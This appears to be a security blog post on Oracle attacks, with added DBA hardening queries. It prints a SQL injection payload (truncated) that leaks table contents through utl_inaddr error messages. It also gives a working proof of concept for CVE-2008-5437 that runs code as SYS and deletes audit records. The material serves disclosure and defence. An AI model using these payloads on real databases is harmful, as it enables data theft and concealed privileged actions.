Chris Gates wrote on his blog that Metasploit now contains exploits for Oracle bugs that were fixed in the October 2008 CPU (lt.compress) and the January 2009 CPU.
Metasploit is becoming more and more useful for Oracle pentesters…
Daniel Kachakil has released an interesting whitepaper about fast data extraction using SQL injection and XML statements on SQL Server, together with a tool implementing this technique called SFX-SQLI.
The paper describes how to retrieve data from a SQL Server database using SQL injection and XML. This technique is not new (at least for me): I have been using such techniques in the Oracle environment via xmltransform or stragg for a while. It is possible to retrieve the entire content of a table in a single error message…
More details will be available in the SQL injection book I am currently writing with some other security researchers…
The tool SFX-SQLI implements the concept for SQL Server.
Here is one example of how to export an entire table, e.g. via utl_inaddr. The output is limited to 4000 bytes:
or 1= utl_inaddr.get_host_name((select xmltransform(sys_xmlagg(sys_xmlgen(username)),xmltype('<?xml version="1.0"?>
Warning: ociexecute(): OCIStmtExecute: ORA-29257: host CUSTCOM_PROD;WEBTOOL;WEBDB;NELLDB;ERDB;B2B;BI;PM;SH;IX;OE;HR;SCOTT;MGMT_VIEW;MDDATA;SYSMAN;MDSYS;SI_INFORMTN_SCHEMA;ORDPLUGINS;ORDSYS;OLAPSYS;ANONYMOUS;XDB;CTXSYS;EXFSYS;WMSYS;DBSNMP;TSMSYS;DIP;OUTLN;SYSTEM;SYS; unknown ORA-06512: at "SYS.UTL_INADDR", line 4 ORA-06512: at "SYS.UTL_INADDR", line 35
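An added example, not from the original post: the hardening check a DBA would run against the channel used above. On a default 10g installation EXECUTE on SYS.UTL_INADDR is granted to PUBLIC, so the account a web application connects with can call get_host_name() and the database echoes the argument back inside ORA-29257. The queries below list who holds the grant, resolve which users would keep it through a role, and revoke the PUBLIC grant; the account name app_namesvc is a placeholder.

```sql
-- Added example (not from the original post): review and remove the
-- PUBLIC grant on UTL_INADDR, the package the injection above uses as
-- an error-message channel. Run as a DBA.

-- 1. Who can execute SYS.UTL_INADDR? On a default 10g install the
--    answer is PUBLIC, i.e. every account in the database.
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'UTL_INADDR'
 ORDER BY grantee;

-- 2. Users who would still reach the package through a role once the
--    PUBLIC grant is gone (direct role grants only; nested roles are
--    not resolved here).
SELECT rp.grantee AS username, tp.grantee AS via_role
  FROM dba_tab_privs tp
  JOIN dba_role_privs rp ON rp.granted_role = tp.grantee
 WHERE tp.owner = 'SYS'
   AND tp.table_name = 'UTL_INADDR'
   AND tp.grantee <> 'PUBLIC'
 ORDER BY rp.grantee;

-- 3. Remove the default grant. Re-grant explicitly to the few accounts
--    that really need name resolution (app_namesvc is a placeholder).
--    Test in a non-production instance first: anything that relies on
--    UTL_INADDR will fail after the revoke.
REVOKE EXECUTE ON sys.utl_inaddr FROM PUBLIC;
-- GRANT EXECUTE ON sys.utl_inaddr TO app_namesvc;

-- 4. Confirm: PUBLIC must no longer be listed.
SELECT grantee
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'UTL_INADDR'
   AND grantee = 'PUBLIC';
```

The revoke closes only this one channel: xmltransform and sys_xmlagg are plain SQL functions available to every session, so the injection itself has to be fixed in the application (bind variables) and the PHP warning should not reach the browser. On 11g the network ACLs managed through DBMS_NETWORK_ACL_ADMIN give finer control over which accounts may call utl_inaddr at all.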
Chris Gates has published a video from the Shmoocon 09 conference in which he shows how to attack Oracle with Metasploit.
Even though the attacks were demonstrated on an outdated version of Oracle (10.1.0.3), it's good to see that the Oracle support in Metasploit is getting better…
Chris has an interesting blog called carnal0wnage.blogspot.com.
Here is the proof-of-concept code for the issue in dbms_ijob [CVE-2008-5437] from Volker Solinus, a really smart DBA and my former colleague from Oracle Consulting Germany.
A different bug concerning auditing, reported by us, is still open. Oracle auditing alone is not sufficient because there are various ways to bypass it. Often it is better to use a 3rd-party solution like Hedgehog from Sentrigo.
-- Bypassing Oracle Auditing
-- Everything executed via dbms_ijob (granted to DBAs by default)
-- will not appear in the Oracle auditing
-- by Volker Solinus
declare
  jj integer := 666666; -- job number
begin
  sys.dbms_ijob.submit(
    JOB       => jj,
    LUSER     => 'SYS',
    PUSER     => 'SYS',
    CUSER     => 'SYS',
    NEXT_DATE => sysdate,
    INTERVAL  => null,
    BROKEN    => false,
    WHAT      => '
  declare
    jj integer := '||jj||';
  begin
    execute immediate ''alter system archive log current'';
    sys.dbms_ijob.remove(jj);
    delete from sys.aud$ where obj$name = ''DBMS_IJOB'';
    commit;
  end;',
    NLSENV    => 'NLS_LANGUAGE=''AMERICAN'' NLS_TERRITORY=''AMERICA'' NLS_CURRENCY=''$'' NLS_ISO_CURRENCY=''AMERICA'' NLS_NUMERIC_CHARACTERS=''.,'' NLS_DATE_FORMAT=''DD-MON-RR'' NLS_DATE_LANGUAGE=''AMERICAN'' NLS_SORT=''BINARY''',
    ENV       => hextoraw('0102000200000000'));
  sys.dbms_ijob.run(jj);
exception when others then
  if sqlcode = -12011 then
    sys.dbms_ijob.remove(jj);
  end if;
  raise;
end;
/
After applying the January 2009 CPU you will get the following error message:
ERROR at line 1:
ORA-12718: operation requires connection as SYS
ORA-06512: at line 32
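An added example, not from the original post and not part of Volker's PoC: the checks a DBA can run to see how far the DBMS_IJOB exposure reaches on a given instance and whether the January 2009 fix is in place. It assumes a 10.2 or later database (DBA_REGISTRY_HISTORY does not exist on older releases); the LIKE patterns in query 3 are a constructed heuristic, not an Oracle-supplied rule.

```sql
-- Added example (not from the original post): inventory the accounts
-- that can reach SYS.DBMS_IJOB, look for legacy jobs shaped like the
-- PoC above, and check whether the CPU that fixes CVE-2008-5437 is
-- installed. Run as a DBA.

-- 1. Direct grants on the package. On a default install the only
--    grantee is the DBA role; any other grantee needs an explanation.
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'DBMS_IJOB'
 ORDER BY grantee;

-- 2. Accounts that hold DBA and therefore inherit that grant. Every
--    one of them could submit a job that runs as SYS without leaving
--    a trace in the audit trail on an unpatched instance.
SELECT grantee, admin_option
  FROM dba_role_privs
 WHERE granted_role = 'DBA'
 ORDER BY grantee;

-- 3. Legacy (DBMS_JOB) jobs whose body touches the audit trail, the
--    job package itself, or issues ALTER SYSTEM. Constructed heuristic:
--    the PoC job removes itself as its last step, so an empty result
--    does not prove that nothing ran; it only catches jobs still queued.
SELECT job, log_user, priv_user, schema_user, next_date, broken, what
  FROM dba_jobs
 WHERE UPPER(what) LIKE '%AUD$%'
    OR UPPER(what) LIKE '%DBMS_IJOB%'
    OR UPPER(what) LIKE '%ALTER SYSTEM%'
 ORDER BY job;

-- 4. Is the January 2009 CPU applied? DBA_REGISTRY_HISTORY (10.2+)
--    records each CPU/PSU install; the COMMENTS column names the patch.
SELECT action_time, action, version, id, comments
  FROM dba_registry_history
 ORDER BY action_time;
```

After the CPU the PoC fails with ORA-12718 as shown above, so query 4 is the quickest way to tell whether an instance is still exposed. Queries 1 and 2 remain useful afterwards: the DBA role is large, and the job-as-SYS path is one reason to keep its membership short.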